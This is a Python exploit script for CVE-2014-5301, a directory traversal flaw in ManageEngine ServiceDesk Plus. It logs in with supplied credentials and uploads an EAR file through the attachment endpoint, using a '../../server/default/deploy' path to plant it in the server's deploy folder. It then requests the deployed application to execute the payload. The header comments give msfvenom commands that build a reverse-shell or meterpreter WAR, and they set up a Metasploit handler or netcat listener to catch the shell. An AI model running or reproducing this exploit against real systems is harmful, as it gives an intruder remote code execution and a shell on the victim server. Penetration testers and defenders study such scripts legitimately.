#!/usr/bin/python3 # This script exploits the directory traversal vulnerability in # ManageEngine ServiceDesk Plus. It has been tested on version 7.6.0. # See also https://www.cvedetails.com/cve/CVE-2014-5301/ # Use msfvenom to create a war file with meterpreter payload # msfvenom -p java/meterpreter/reverse_tcp LHOST= LPORT=4444 -f war > shell.war # # or with a reverse TCP shell # msfvenom -p java/shell_reverse_tcp LHOST= LPORT=4444 -f war > shell.war # Before executing the script start the meterpreter handler # meterpreter # use multi/handler # set payload java/meterpreter/reverse_tcp # set LHOST # run # # or start netcat listener on LPORT # nc -nlvp 4444 # Script usage: ./CVE-2014-5301.py HOST PORT USERNAME PASSWORD WARFILE # HOST: target host # PORT: target port # USERNAME: a valid username for ManageEngine ServiceDesk Plus # PASSWORD: the password for the user # WARFILE: a war file containing the mallicious payload from io import BytesIO from xml.etree import ElementTree import base64 import os import random import requests import string import sys import time import zipfile # Generate a random string of given length def random_string(length): charset = string.ascii_uppercase + string.ascii_lowercase + string.digits return ''.join(random.choice(charset) for _ in range(length)) # Extract name from web.xml in the given war file def get_war_app_base(war_file): with zipfile.ZipFile(war_file, "r") as war: with war.open("WEB-INF/web.xml") as web_inf: xml_root = ElementTree.fromstring(web_inf.read()) return xml_root.find('servlet').find('servlet-name').text # Check command line arguments if (len(sys.argv) - 1) != 5: print("Usage: ./CVE-2014-5301.py HOST PORT USERNAME PASSWORD WARFILE") exit(1) # Initialize host = sys.argv[1] port = sys.argv[2] username = sys.argv[3] password = sys.argv[4] war_file_name = sys.argv[5] me_base_url = "http://" + host + ":" + port s = requests.session() # Get JSESSIONID which we have to pass during the authentication request url = me_base_url + "/" s.get(url) # Authenticate the user with provided credentials url = me_base_url + "/j_security_check" data = dict(j_username=username, j_password=password, logonDomainName=-1) s.post(url, data=data) # Upload bogous file - currently not needed # url = me_base_url + "/common/FileAttachment.jsp" # multipart_data = [ # ("module", (None, random_string(4))), # (random_string(8), (random_string(8), random_string(32), "application/octet-stream")), # ("att_desc", (None, "")) # ] # s.post(url, files=multipart_data) # Create ear file from the given war file display_name = random_string(32) ear_app_base = random_string(32) ear_file_name = ear_app_base + ".ear" war_app_base = get_war_app_base(war_file_name) application_xml = "" application_xml += "" application_xml += "" + display_name + "" application_xml += "" + war_file_name + "" application_xml += "/" + ear_app_base + "" application_xml += "" war_file = open(war_file_name, "rb") war_file_content = war_file.read() war_file.close() in_mem_ear = BytesIO() with zipfile.ZipFile(in_mem_ear, "w", zipfile.ZIP_STORED) as ear_file: ear_file.writestr("META-INF/application.xml", application_xml) ear_file.write(war_file_name) # Upload ear file url = me_base_url + "/common/FileAttachment.jsp" multipart_data = [ ("module", (None, "../../server/default/deploy")), (random_string(4), (ear_file_name, in_mem_ear.getvalue(), "application/octet-stream", {"Content-Transfer-Encoding": "binary"})), ("att_desc", (None, "")) ] req = requests.Request("POST", url, files=multipart_data) prepared_req = s.prepare_request(req) settings = s.merge_environment_settings(prepared_req.url, {}, None, None, None) r = s.send(prepared_req, **settings) # Execute uploaded payload for i in range(5): url = me_base_url + "/" + ear_app_base + "/" + war_app_base + "/" + random_string(16) print("Trying " + url) resp = s.get(url) if (resp.status_code == 200): exit(0) else: time.sleep(3)